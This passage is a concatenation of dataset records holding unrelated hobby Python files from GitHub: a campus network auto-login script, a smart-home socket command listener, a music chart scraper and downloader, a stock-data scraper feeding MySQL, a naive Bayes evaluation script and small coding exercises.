Type `help` for the list of available commands')\n","repo_name":"AntAndTim/distributed-file-system","sub_path":"client/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":7361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"14305125497","text":"import socket\nimport time\n\nimport requests\nimport retrying\nfrom loguru import logger\n\nDEFAULT_CONFIGS = {\n 'ip-ping': 'www.baidu.com',\n 'header': {\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36\"\n },\n 'zone': {\n 'office': 'https://drcom.szu.edu.cn',\n 'dormitory': 'http://172.30.255.2/0.htm'\n }\n}\n\n\nclass DisconnectError(Exception):\n pass\n\n\ndef disconnect_error(exception):\n return isinstance(exception, ZeroDivisionError)\n\n\nclass Connector:\n def __init__(self, config, log_printer=None):\n self.run_flag = False\n self.set_logger(log_printer)\n self.set_config(config)\n\n @staticmethod\n def set_logger(log_printer):\n log_fmt = \"{time:YYYY-MM-DD | HH:mm:ss} | {level} | {message}\"\n if log_printer is not None:\n logger.add(log_printer, level=\"DEBUG\", format=log_fmt)\n else:\n logger.add('auto-connect.log', level=\"DEBUG\", format=log_fmt)\n logger.info(\"Auto-Connect Init\")\n\n def set_config(self, config: dict):\n try:\n self.headers = DEFAULT_CONFIGS['header']\n self.login_url = DEFAULT_CONFIGS['zone'][config['zone']]\n self.ping_ip = DEFAULT_CONFIGS['ip-ping']\n self.data_send = {\n \"DDDDD\": f\"{config['username']}\",\n \"upass\": f\"{config['password']}\",\n \"R1\": \"0\",\n \"R2\": \"\",\n \"R6\": \"0\",\n \"para\": \"00\",\n \"OMKKey\": \"123456\"\n }\n self.interval = config['interval']\n print_config = config\n # hide password\n print_config['password'] = config['password'][:2] + '***' + config['password'][-2:]\n logger.info(f\"Auto-Connect Load config {print_config}\")\n except KeyError as e:\n logger.error(f'Please check the config, {e}')\n\n def connect(self):\n # requests.packages.urllib3.disable_warnings()\n session = requests.session()\n r = session.post(self.login_url, headers=self.headers, data=self.data_send, verify=False)\n logger.info(\"Posted\")\n # print(r.text)\n\n # def check_connect(self):\n # s = socket.socket()\n # s.settimeout(3)\n # try:\n # status = s.connect_ex((self.ping_ip, 443))\n # if status == 0:\n # s.close()\n # logger.info(\"Connected\")\n # return True\n # else:\n # logger.info(\"Disconnected\")\n # raise DisconnectError\n # # return False\n # except Exception as e:\n # logger.error(f'Find Error in check connect, {e}')\n # raise DisconnectError\n\n def check_connect(self):\n timeout = 5\n try:\n ping_ip = \"https://\" + self.ping_ip\n request = requests.get(ping_ip, timeout=timeout)\n logger.info(\"Connected\")\n return True\n # except (requests.ConnectionError, requests.Timeout) as e:\n except Exception as e:\n logger.error(f'Disconnected, Error [{e}]')\n raise DisconnectError\n\n def stop(self):\n logger.info(\"Stop\")\n self.run_flag = False\n\n @retrying.retry(retry_on_exception=disconnect_error)\n def run(self):\n logger.info('Start Run')\n try:\n self.check_connect()\n except DisconnectError:\n self.connect()\n except Exception as e:\n logger.error(f'Find Error when running: {e}')\n raise DisconnectError\n finally:\n # double check\n self.check_connect()\n\n def loop(self):\n self.run_flag = True\n while self.run_flag:\n self.run()\n 
time.sleep(60)\n","repo_name":"ackness/szu-autoconnect","sub_path":"szu_autoconnect/core/auto.py","file_name":"auto.py","file_ext":"py","file_size_in_byte":3829,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"54"} +{"seq_id":"34002214647","text":"import datetime\nimport socket\nimport json\nimport time\nimport traceback\nfrom threading import Thread\n\nclass CommandListener:\n\n def __init__(self, local_ip_address: str, listener_port: int, write_function, read_function):\n self.write_function = write_function\n self.read_function = read_function\n for a in range(1, 4):\n try:\n self.socket = socket.socket()\n self.socket.bind((local_ip_address, listener_port))\n print(\"Web socket listener registered on port: \" + str(listener_port))\n break\n except Exception as e:\n self.socket.close()\n print(e)\n print(\"trying to establish a socket. --\" + str(a))\n time.sleep(5)\n if a == 3:\n raise e\n self.listening_thread = Thread(target=self.__start_listening)\n self.listening = False\n\n def start_listening(self):\n self.listening = True\n self.listening_thread.start()\n print(\"Web socket is listening for commands.\")\n\n def stop_listening(self):\n self.listening = False\n\n def __start_listening(self):\n self.socket.listen()\n while self.listening:\n try:\n c, addr = self.socket.accept()\n data = c.recv(2048)\n if data:\n data = json.loads(data.decode())\n t = datetime.datetime.now()\n print(f\"Connection: {addr}\\t {t.strftime('%Y-%m-%d')}\\t {t.strftime('%H:%M:%S')}\")\n print(data)\n print(\"----------\")\n if data[\"mode\"] == \"write\":\n Thread(target=self.write_function, args=(data,)).start()\n c.close()\n elif data[\"mode\"] == \"read\":\n Thread(target=self.__wait_for_response, args=(c, data,)).start()\n else:\n c.close()\n except Exception as e:\n print(\"ERROR:\")\n traceback.print_exc()\n except KeyboardInterrupt:\n print(\"application is forced to stop.\")\n exit(0)\n\n def __wait_for_response(self, c: socket, data):\n c.send(json.dumps(self.read_function(data)).encode())\n c.close()","repo_name":"lypoluz/modular-smart-home","sub_path":"Backend/commandListener.py","file_name":"commandListener.py","file_ext":"py","file_size_in_byte":2349,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"31554443773","text":"from collections import deque\n# 처음 문제를 접근할 때는 DFS를 활용하여 진행하였음. 하지만 여러 테스트 케이스에서 문제점이 발견됨\n# BFS를 활용하여 문제를 해결하였음. 
\n\ndef next_step(maps, p):\n    nexts = deque()\n    n = len(maps) # row size\n    m = len(maps[0]) # col size\n\n    # (down, right, up, left)\n    for t in [(1, 0), (0, 1), (-1, 0), (0, -1)]:\n        if 0 <= p[0] + t[0] < n and 0 <= p[1] + t[1] < m:\n            if maps[p[0]+t[0]][p[1]+t[1]] == 1:\n                nexts.append((p[0]+t[0], p[1]+t[1]))\n\n    return nexts\n\n\ndef solution(maps):\n    answer = -1\n    n = len(maps)\n    m = len(maps[0])\n\n    end = (n-1, m-1)\n    begin = (0, 0)\n    maps[0][0] = 0\n    begin_item = [begin, 1] # [point, cnt]\n\n    q = deque([begin_item])\n    while q:\n        current, cnt = q.popleft()\n\n        if current == end:\n            return cnt\n\n        nxts = next_step(maps, current)\n        for nxt in nxts:\n            q.append([nxt, cnt+1])\n            maps[nxt[0]][nxt[1]] = 0\n\n    return answer","repo_name":"ChanHoLee275/programmers-coding-test-practice","sub_path":"level2/게임-맵-최단거리.py","file_name":"게임-맵-최단거리.py","file_ext":"py","file_size_in_byte":1046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"3810507508","text":"import requests, pymysql, re, datetime\nimport pandas as pd\nfrom bs4 import BeautifulSoup\nfrom sqlalchemy import create_engine\n\nheaders = {\n    'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36'\n}\n\n\ndef DownStockCode():\n    print('Fetching Shanghai and Shenzhen stock codes')\n    count = 0\n    stockcodeList=[]\n    urlList = ['https://www.banban.cn/gupiao/list_sh.html','https://www.banban.cn/gupiao/list_sz.html']\n    for url in urlList:\n        res = requests.get(url=url,headers=headers)\n        bs_res = BeautifulSoup(res.text,'html.parser')\n        stocklist=bs_res.find('div',id='ctrlfscont').find_all('li')\n        for stock in stocklist:\n            stockhref=stock.find('a')['href']\n            list_stockhref=stockhref.strip().split('/')\n            stock_code=list_stockhref[2]\n            stockcodeList.append(stock_code)\n            count += 1\n            print('Fetched {} stock codes so far'.format(count),end='\\r')\n    print('Fetched all Shanghai/Shenzhen stock codes: {} in total'.format(len(stockcodeList)))\n    return stockcodeList\n\n\ndef DownStockZSCode():\n    print('Fetching Shanghai and Shenzhen index codes')\n\n\ndef CreateDatabase(host,user,password,dbname):\n    db = pymysql.connect(\n        host = host,\n        user = user,\n        password = password,\n        port = 3306\n    )\n    cursor = db.cursor()\n    sql = 'create database if not exists '+ dbname\n    cursor.execute(sql)\n    db.close()\n    print('Checked/created the local storage database - STOCK')\n\n# Create one data table per stock code to store that stock's data, e.g. table: s_600001\ndef CreateTable(host,user,password,dbname,codeList):\n    print('Checking/creating stock data tables')\n    db = pymysql.connect(\n        host = host,\n        user = user,\n        password = password,\n        database = dbname,\n        charset=\"utf8\"\n    )\n    cursor = db.cursor()\n    count = len(codeList)\n    num = 0\n    for code in codeList:\n        num += 1\n        sql = 'create table if not exists s_'+code+'(\\\n            stockName varchar(250) not null,\\\n            dateTime varchar(250) not null, \\\n            startPrice varchar(100), \\\n            maxPrice varchar(100), \\\n            minPrice varchar(100), \\\n            endPrice varchar(100), \\\n            diffPrice varchar(100), \\\n            diffPercent varchar(100), \\\n            turnoverAmount varchar(100), \\\n            amount varchar(100), \\\n            amplitude varchar(100), \\\n            turnoverPercent varchar(100)) DEFAULT CHARSET=utf8'\n        cursor.execute(sql)\n        print('Checking/creating table: s_{}, {}/{}'.format(code,num,count),end='\\r')\n    db.close()\n\n    print('All database tables checked/created!!')\n\n# Get all table names, query each table's latest quote date, and return them as a list: [[stock code, latest date],['600001','2020-12-3'],['600002','NULL']]\ndef GetNearestDate(host,user,password,dbname):\n    print('Fetching the last trading date of every stock table')\n    count_empty = 0 # counts the empty tables\n    tablelist = [] # stores the fetched table names\n    nearestdatelist = []# stores the stock codes and their latest quote dates\n    db = pymysql.connect(
\n        host = host,\n        user = user,\n        password = password,\n        database = dbname,\n        charset=\"utf8\"\n    )\n    cursor = db.cursor()\n    sql_showtables = 'show tables'\n    cursor.execute(sql_showtables) # query the table names\n    for i in cursor:\n        tablelist.append(str(i)) # store the table names in a list\n    for tablename in tablelist:\n        code = re.sub('\\D','',tablename)# keep only the digits in the table name, i.e. the stock code\n        sql_s_dateTime = 'select * from s_'+code+' order by dateTime desc limit 1' # fetch the last row of the table\n        lastrow = pd.read_sql(sql_s_dateTime,db)\n        if lastrow.empty:\n            dateTime = 'Null'\n            count_empty += 1\n        else:\n            dateTime = lastrow['dateTime'][0]\n        nearestdatelist.append([code,dateTime])\n        print('Got the last trading date of {}: {}  progress: {}/{} '.format(code,dateTime,len(nearestdatelist),len(tablelist)), end='\\r')\n    db.close()\n    print('Last trading dates fetched for all {} stocks; {} of them need a full history download'.format(len(nearestdatelist),count_empty))\n    return nearestdatelist\n\n\n# Read the database tables and update or download stock data based on what is found: last date NULL means download everything; last date current means skip; last date stale means update\ndef UpdateAndDown(host,user,password,dbname,new_date):\n    count_downall = 0 # number of stocks needing a full history download\n    count_update = 0 # number of stocks needing an update\n    count_all = 0 # number of stocks processed so far\n    stocklist = GetNearestDate(host,user,password,dbname)\n    stocknum = len(stocklist)\n    for stock in stocklist:\n        count_all += 1\n        print('Scraping progress {}/{}, updating table: s_{}'.format(count_all,stocknum,stock[0]),end='\\r')\n        if stock[1] == 'Null': # if the stock has no data yet, download its full history\n            stockdata = DownAllData(stock[0])\n            count_downall +=1\n        elif stock[1] == new_date: # skip if the stock is already up to date\n            continue\n        else:\n            stockdata = UpdateData(stock[0],stock[1])# otherwise update from the last recorded date\n            count_update +=1\n        df = pd.DataFrame(stockdata,columns=['stockName','dateTime','startPrice','maxPrice','minPrice','endPrice','diffPrice','diffPercent','turnoverAmount','amount','amplitude','turnoverPercent'])\n        engine = create_engine('mysql+pymysql://'+user+':'+password+'@'+host+':'+'3306/'+dbname)\n        tablename = 's_'+stock[0]\n        df.to_sql(\n            name = tablename,\n            con = engine,\n            index = False,\n            if_exists = 'append')\n    print('All stock data downloaded! Full downloads: {} stocks, updates: {} stocks'.format(count_downall,count_update))\n\n\ndef GetSeason(month):\n    month = int(month)\n    if month >= 1 and month <= 3:\n        season = 1\n    elif month >= 4 and month <= 6:\n        season = 2\n    elif month >= 7 and month <= 9:\n        season = 3\n    else:\n        season = 4\n    return season\n\n\n# If the table is empty, download the stock's full price history; returns stockName (the stock's name) and stockdate (the list of historical rows)\ndef DownAllData(code):\n    yearlist = [] # years for which the stock has data\n    pagelist = [] # constructed page URLs waiting to be scraped\n    stockdate = [] # the scraped stock rows\n    url = 'http://quotes.money.163.com/trade/lsjysj_'+code+'.html?'\n    res = requests.get(url = url,headers = headers)\n    bs_res = BeautifulSoup(res.text,'html.parser')\n    stockName = bs_res.find('div',class_='stock_info').find('h1',class_='name').find('a').text\n    item = bs_res.find('form',id = 'date').find_all('option') # the years and quarters with available data\n    now_dateTime = datetime.datetime.now().date()# current date\n    now_year = now_dateTime.year\n    now_month = now_dateTime.month\n    now_season = GetSeason(now_month)\n    for i in item[:-4]: # keep only the years\n        yearlist.append(i.text)\n    for year in yearlist: # build the page URLs to scrape\n        if int(year) == now_year: # for the current year, only build links up to the current quarter, since it is not necessarily Q4 yet\n            for i in range(now_season):\n                season = now_season - i\n                url_page = 'http://quotes.money.163.com/trade/lsjysj_'+code+'.html?year='+str(year)+'&season='+str(season)\n                pagelist.append(url_page)\n        else:\n            for s in range(4): # for past years, build links for all four quarters\n                url_page = 'http://quotes.money.163.com/trade/lsjysj_'+code+'.html?year='+str(year)+'&season='+str(4-s)\n                pagelist.append(url_page)\n    for page in pagelist:\n        res = requests.get(url = page,headers = headers)\n        bs_res = BeautifulSoup(res.text,'html.parser')
\n        pageinfo = bs_res.find('table',class_='table_bg001').find_all('tr')\n        flag = 0\n        for row in pageinfo:\n            if flag:\n                rowData = row.find_all('td') # extract every td tag in the row\n                rowData_List = [] # holds the extracted td texts\n                for td in rowData:\n                    rowData_List.append(td.text)\n                dateTime = rowData_List[0]# opening date\n                startPrice = rowData_List[1]# opening price\n                maxPrice = rowData_List[2]# highest price\n                minPrice = rowData_List[3]# lowest price\n                endPrice = rowData_List[4]# closing price\n                diffPrice = rowData_List[5]# price change\n                diffPercent = rowData_List[6]# percent change\n                turnoverAmount = rowData_List[7]# trading volume\n                amount = rowData_List[8]# turnover\n                amplitude = rowData_List[9]# amplitude\n                turnoverPercent = rowData_List[10]# turnover rate\n                stockdate.append([stockName,dateTime,startPrice,maxPrice,minPrice,endPrice,diffPrice,diffPercent,turnoverAmount,amount,amplitude,turnoverPercent])\n            else:\n                flag = 1\n    stockdate.reverse() # reverse the order so the oldest rows come first\n    return stockdate\n\n\n# If the table is not empty, update from the opening date of its last record up to the actual latest date; returns stockName (the stock's name) and stockdata (the rows to append)\ndef UpdateData(code,dateTime):\n    stockdata = [] # the scraped stock rows\n    dateTime = datetime.datetime.strptime(dateTime,'%Y-%m-%d').date()\n    nowTime = datetime.datetime.now().date()# current date, year, month and quarter\n    now_year = nowTime.year\n    now_month = nowTime.month\n    now_season = GetSeason(now_month)\n    y = now_year # year cursor used when building the URLs below\n    s = now_season # quarter cursor used when building the URLs below\n    flag = 1 # loop control\n    while flag: # build the URLs and scrape the data\n        url = 'http://quotes.money.163.com/trade/lsjysj_'+code+'.html?year='+str(y)+'&season='+str(s)\n        res = requests.get(url = url,headers = headers)\n        bs_res = BeautifulSoup(res.text,'html.parser')\n        stockName = bs_res.find('div',class_='stock_info').find('h1',class_='name').find('a').text\n        pageinfo = bs_res.find('table',class_='table_bg001').find_all('tr')\n        f = 0 # used to skip the header row of the stock data\n        for row in pageinfo:\n            if f:\n                rowData = row.find_all('td') # extract every td tag in the row\n                rowData_List = [] # holds the extracted td texts\n                for td in rowData:\n                    rowData_List.append(td.text)\n                dateTime_ = rowData_List[0]# opening date\n                startPrice = rowData_List[1]# opening price\n                maxPrice = rowData_List[2]# highest price\n                minPrice = rowData_List[3]# lowest price\n                endPrice = rowData_List[4]# closing price\n                diffPrice = rowData_List[5]# price change\n                diffPercent = rowData_List[6]# percent change\n                turnoverAmount = rowData_List[7]# trading volume\n                amount = rowData_List[8]# turnover\n                amplitude = rowData_List[9]# amplitude\n                turnoverPercent = rowData_List[10]# turnover rate\n                if dateTime < datetime.datetime.strptime(dateTime_,'%Y-%m-%d').date(): # only keep rows newer than the given date\n                    stockdata.append([stockName,dateTime_,startPrice,maxPrice,minPrice,endPrice,diffPrice,diffPercent,turnoverAmount,amount,amplitude,turnoverPercent])\n                else:\n                    flag = 0 # a row matches the given date, so exit the while loop\n                    break\n            else:\n                f = 1\n        s -= 1 # every row on this page was newer than the given date, so step back one quarter and scrape the previous page\n        if s == 0: # when the quarter cursor reaches 0, reset it to 4 and step back one year\n            s = 4\n            y -= 1\n    stockdata.reverse() # reverse the order so the oldest rows come first\n    return stockdata\n\n\n# Create one data table per stock code to store that stock's data, e.g. table: s_600001\ndef CreateTable1(host,user,password,dbname,):\n    print('Checking/creating stock data tables')\n    db = pymysql.connect(\n        host = host,\n        user = user,\n        password = password,\n        database = dbname,\n        charset=\"utf8\"\n    )\n    cursor = db.cursor()\n\n    num = 0\n    code = 'qqq12313123'\n    sql = \"create table if not exists s_\" + code + \"(\\\n        stockName varchar(250) not null comment '1231',\\\n        dateTime varchar(250) not null, \\\n        startPrice varchar(100), \\\n        maxPrice varchar(100), \\\n        minPrice varchar(100), \\\n        endPrice varchar(100), \\\n        diffPrice varchar(100), \\\n        diffPercent varchar(100), \\\n        turnoverAmount varchar(100), \\\n        amount varchar(100), \\\n        amplitude varchar(100), \\\n        turnoverPercent varchar(100)) DEFAULT CHARSET=utf8\"\n    cursor.execute(sql)\n    # print('Checking/creating table: s_{}, {}/{}'.format(code,num,count),end='\\r')
\n    db.close()\n\n    print('All database tables checked/created!!')\n\n\nif __name__ == '__main__':\n    # fetch the stock codes\n    stockcodeList = DownStockCode()\n    # check the database\n    CreateDatabase('127.0.0.1', 'root', '', 'Ticker')\n    CreateTable('127.0.0.1', 'root', '', 'Ticker',stockcodeList)\n    # scrape the data\n    today = datetime.datetime.now()\n    str_date = today.strftime(\"%Y-%m-%d\")\n    UpdateAndDown('127.0.0.1', 'root', '', 'Ticker',str_date)\n","repo_name":"caichongbo/LH","sub_path":"getdata/getTickers.py","file_name":"getTickers.py","file_ext":"py","file_size_in_byte":13950,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"28459429368","text":"\"\"\"\r\nCreate a program that stores the dictionary\r\n{'Euro':'€', 'Dollar':'$', 'Yen':'¥'} in a variable, asks the\r\nuser for a currency, and prints its symbol, or a warning\r\nmessage if the currency is not in the dictionary.\r\n\"\"\"\r\n\r\ndivisas = {\r\n    'Euro': '€',\r\n    'Dollar':'$',\r\n    'Yen':'¥'\r\n}\r\n\r\n# lowercase the user's input\r\ndivisa_input = input('Enter a currency: ').casefold()\r\n# uppercase the first letter and concatenate the rest of the string as is\r\ndivisa_input = divisa_input[0].upper() + divisa_input[1:]\r\n\r\nif divisa_input in divisas:\r\n    print(divisas[divisa_input])\r\nelse:\r\n    print('Currency not found')","repo_name":"GuadaIt/python-exercises","sub_path":"13.py","file_name":"13.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"40827463007","text":"#!venv/bin/python3\n# -*- coding: utf-8 -*-\n__author__ = \"Benjamin Trubert, Kévin Huguenin, Alpha Diallo, Lev Velykoivanenko, Noé Zufferey\"\n__copyright__ = \"Copyright 2021, The Information Security and Privacy Lab at the University of Lausanne (\" \\\n                \"https://www.unil.ch/isplab/)\"\n__credits__ = [\"Benjamin Trubert\", \"Kévin Huguenin\", \"Alpha Diallo\", \"Lev Velykoivanenko\", \"Noé Zufferey\",\n               \"Vaibhav Kulkarni\"]\n\n__version__ = \"1\"\n__license__ = \"MIT\"\n__maintainer__ = \"Kévin Huguenin\"\n__email__ = \"kevin.huguenin@unil.ch\"\n\nfrom location import *\nimport re\nfrom datetime import datetime, timezone, timedelta\n\n\nclass LogsLocationProvider(ListLocationProvider):\n\n    def __init__(self, log_file: str):\n        # The attribute holding the file name is private, and the\n        # __samples attribute is inherited from ListLocationProvider\n        self.__file = log_file\n        samples = []\n        try:\n            f = open(log_file)\n            lines = f.readlines()\n            for l in lines:\n                line = l.strip('\\n')\n                if line.find(\"source: GPS\") != -1: # keep only the GPS coordinates\n                    t, lat, lng = LogsLocationProvider._extract_location_sample_from_log(line)\n                    if not (t is None or lat is None or lng is None):\n                        loc = LocationSample(t, Location(lat, lng))\n                        samples.append(loc)\n        except FileNotFoundError as e:\n            if Configuration.get_instance().get_element('verbose'):\n                print(\"Unable to find the given file.\")\n        super().__init__(samples)\n\n    def __str__(self):\n        return \"LogsLocationProvider (\" + str(self.__file) + \", \" + str(\n            len(self.get_location_samples())) + \" location samples)\"\n\n    # LogsLocationProvider (source: ../data/logs/jdoe.log, 2 location samples)\n\n    @staticmethod\n    def _extract_location_sample_from_log(log: str):\n        \"\"\"\n        Returns the time, latitude, and longitude, if available, from a given\n        log.\n\n        Returns\n        -------\n        The extracted time, latitude, and longitude.\n        \"\"\"\n\n        (t, lat, lng) = (None, None, None)
\n\n        start = log.find(\"[\")\n        end = log.find(\"]\")\n        date_line = log[start + 1:end]\n        # handle the UNKNOWN entries\n        t = datetime.strptime(date_line, \"%Y-%m-%dT%H:%M:%S.%f\")\n        # remove [] substring\n        line = log.split(\"]\")[1]\n        pair = re.findall(r\"[-+]?\\d*\\.\\d+|\\d+\", line)\n        if not len(pair) == 0:\n            lat = float(pair[0])\n            lng = float(pair[1])\n        return t, lat, lng\n\n\nif __name__ == '__main__':\n    # Test this class's implementation with the statements in this main\n    # block (the expected output is shown below).\n\n    lp = LogsLocationProvider('../data/logs/hschmidt.log')\n    #print(lp)\n    print(lp.get_surrounding_temporal_location_samples(\n        datetime.strptime('2021-04-08 09:16:23', '%Y-%m-%d %H:%M:%S').replace(tzinfo=timezone(timedelta(hours=2)))))\n    lp.show_location_samples()\n    lp.print_location_samples()\n\n    ### Expected output ###\n\n    # LogsLocationProvider (source: ../data/logs/hschmidt.log, 3 location samples)\n    # LocationSample [datetime: 2021-04-08 09:16:21+02:00, location: Location [latitude: 46.52334, longitude: 6.57551]]\n    # LocationSample [datetime: 2021-04-08 09:23:04+02:00, location: Location [latitude: 46.52475, longitude: 6.58057]]\n    # LocationSample [datetime: 2021-04-08 09:27:18+02:00, location: Location [latitude: 46.52199, longitude: 6.58423]]\n","repo_name":"emilio-gambino/Sherlock","sub_path":"skeleton/logs.py","file_name":"logs.py","file_ext":"py","file_size_in_byte":3586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"5946816675","text":"# Write a Python function to multiply all the values in\n# a dictionary. Take the dictionary as the function's parameter.\n\n\ndef multiplyDict(dict):\n    result = 1\n    for x in dict.values():\n        result = result * x\n    print(result)\n\ndict={\"a\":2,\"b\":6,\"c\":5}\nmultiplyDict(dict)","repo_name":"MuhammadAnas14/Python-Course-Project-Vendors","sub_path":"Practice Problem 2 Solution/Question7.py","file_name":"Question7.py","file_ext":"py","file_size_in_byte":281,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"37468400762","text":"# -*- coding: utf-8 -*-\nfrom bs4 import BeautifulSoup as bs\nimport requests\nfrom selenium import webdriver\nimport time\n# # This project scrapes the Kugou music charts and batch-downloads the songs\ndef down(url):\n    option = webdriver.ChromeOptions()\n    option.add_argument(\"headless\")\n    browser = webdriver.Chrome('E:\\python\\Scripts\\chromedriver.exe', chrome_options=option)\n    browser.get(url)# e.g. the song \"A Yi Mo\"\n    response=browser.page_source\n    audiutl=browser.find_element_by_id('myAudio')\n    time.sleep(2)\n    print('*****************'+audiutl.get_property('src'))\n    return audiutl.get_property('src')\n\n    #browser.close()# close the other browser windows\n#*****************************************************************************************************************************************\n# This function scrapes the song information:\nsong_list_info=[]# holds the full song list\nsong_download_url=[]# the real download links obtained after filtering\nheaders={\n    'user-agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.54 Safari/537.36'\n}# shared request headers\ndef SongInformation(page):\n    urls='https://www.kugou.com/yy/rank/home/'+page+'-8888.html'\n\n    re=requests.get(url=urls,headers=headers)\n    #save=re.content.decode('utf-8')\n    save=re.text\n    if save!=None:\n        soup=bs(save,'html.parser')\n        rank=soup.select('span.pc_temp_num')# song ranks\n        musichref=soup.select('div.pc_temp_songlist>ul>li>a')\n        mhref=[]# song links\n        list=[]# combined song info\n        singer = []# singer names\n        songname = []# song names\n        for i in musichref:
\n            mhref.append(i['href'])# append the song link\n            list.append(i['title'].split(' - ',2))# append the artist and the song name\n        for i in list:\n            songname.append(i[1])\n            singer.append(i[0])\n        for i,j,k in zip(mhref,songname,singer):\n            song_infor = {\n                'url':i,\n                'name':j,\n                'singer':k\n            }\n            song_list_info.append(song_infor)\n    else:\n        pass\n#*****************************************************************************************************************************************\ndef KuGouDownload(startpage,endpage):\n    for i in range(startpage,endpage):\n        try:\n            print('Storing the song info of page '+str(i+1))\n            SongInformation(str(i+1))\n            print('Page '+str(i+1)+' song info stored successfully')\n            time.sleep(1)\n        except:\n            print('Failed to store the song info of page '+str(i+1)+', the page has been skipped')\n    for i in song_list_info:\n        print(i['name'] + ' download URL:')\n        z=down(i['url'])\n        #print('************'+z)\n        #z=song_download_url.append(down(i['url']))\n        with open(\"D:\\\\KugouSpider\\\\下载音乐\\\\{}.mp3\".format(i[\"name\"]), 'wb') as f:\n            mp3 = requests.get(z, headers=headers).content\n            f.write(mp3)\n    print('All songs have been downloaded')\n#********************************************************************************************************************************************\ndef main():\n    try:\n        a=input('Enter the start page of the download (defaults to the first page): ')\n        if a==''or a=='1':\n            a=0\n        else:\n            a=int(a)\n        b=input('Enter the end page of the download (23 at most): ')\n        b=int(b)\n        #if b>23\n        print(\"You want to download pages \"+str(a)+' to '+str(b))\n        print('The download is about to start, please do not shut down or stop the program!')\n        KuGouDownload(a,b)\n        print('All music has been downloaded, enjoy.')\n    except:\n        print('The input is invalid, please run this program again.')\nif __name__ == '__main__':\n    main()","repo_name":"ZhuMengMeng666/KugouSpider","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3800,"program_lang":"python","lang":"zh","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"23204078520","text":"######################################################################################\n# Eduardo Moura Cirilo Rocha, mouracirilor@wisc.edu\n# March of 2019\n# t-test\n######################################################################################\n\nimport json\nimport numpy as np \nimport sys\nimport math\n\nfrom random import shuffle\nfrom bayes_function import bayes\n\n\ntrainingSetPath = \"../datasets/tic-tac-toe.json\"\ntestSetPath = \"../datasets/tic-tac-toe.json\"\n\n# Load data\nwith open(trainingSetPath) as f:\n    trainSet = json.load(f)\n# Load test set\nwith open(testSetPath) as f:\n    testSet = json.load(f)\nData = trainSet[\"data\"]\nfoldSize = round((len(Data))/10)\n\n# randomly shuffle data before separating folds\nshuffle(Data)\n\n# Print file header\nprint(\"TAN NaiveBayes\")\n\n# create fold and apply classifier\nfor i in range(10):\n\ttestData = []\n\ttrainingData = []\n\ttestFoldIdx = [foldSize*i, foldSize*(i+1)]\n\tif testFoldIdx[1] > len(Data): testFoldIdx[1] = len(Data)\n\tfor j in range(len(Data)):\n\t\tif j in range(testFoldIdx[0], testFoldIdx[1]+1):\n\t\t\ttestData.append(Data[j])\n\t\telse:\n\t\t\ttrainingData.append(Data[j])\n\n\t# TAN\n\tresults_t = bayes(trainingSetPath, testSetPath, \"t\", trainingData, testData)\n\tpredictions = [probability >= 0.5 for probability in results_t[1]]\n\taccuracy_t = sum([predictions[i] == results_t[0][i] \\\n\t\tfor i in range(len(predictions))])/len(predictions)\n\n\t# Naive Bayes\n\tresults_n = bayes(trainingSetPath, testSetPath, \"n\", trainingData, testData)\n\tpredictions = [probability >= 0.5 for probability in results_n[1]]\n\taccuracy_n = sum([predictions[i] == results_n[0][i] \\\n\t\tfor i in range(len(predictions))])/len(predictions)\n\n\t# print accuracy 
results\n\tprint(\"%.4f\"%accuracy_t, end = \" \")\n\tprint(\"&\", end = \" \")\n\tprint(\"%.4f\"%accuracy_n, end = \" \")\n\tprint(\"&\", end = \" \")\n\tprint(\"%.4f\"%(accuracy_t - accuracy_n), end = \"\\\\\\\\ \\n\")\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"mcreduardo/NaiveBayes_and_TAN_python","sub_path":"code/t_test.py","file_name":"t_test.py","file_ext":"py","file_size_in_byte":1869,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"41720618326","text":"''' sentinel search:In this search, the last element of the array is replaced with the\r\n element to be searched and then the linear search is performed on the array without \r\n checking whether the current index is inside the index range of the array or not \r\n because the element to be searched will definitely be found inside the array even \r\n if it was not present in the original array since the last element got replaced with it. \r\n So, the index to be checked will never be out of the bounds of the array. \r\n The number of comparisons in the worst case there will be (N + 2). '''\r\n \r\ndef sentinelsearch():\r\n list=[]\r\n n=int(input(\"Enter the number of elements to insert list:\"))\r\n for i in range (n):\r\n e = int(input(\"enter key element:\"))\r\n list.append(e)\r\n print(list)\r\n key=int(input(\"Enter the number you want to search:\"))\r\n last = list[n-1]\r\n list[n-1]=key #assigning key value to the last position in list\r\n i=0\r\n while (list[i]!=key):\r\n i+=1\r\n list[n-1]=last #put last element back to position\r\n if((i',\n 'GTEQ': '>=',\n 'LT': '<',\n 'LTEQ': '<=',\n 'NE': '!='\n }\n\nFIELDS = {'CITY': 'city',\n 'TOPIC': 'topics',\n 'MONTH': 'month',\n 'MAX_ATTENDEES': 'maxAttendees',\n 'DURATION': 'duration',\n 'SESS_START_TIME': 'startTime',\n 'TYPE_OF_SESSION': 'typeOfSession'\n }\n\nCONF_GET_REQUEST = endpoints.ResourceContainer(\n message_types.VoidMessage,\n 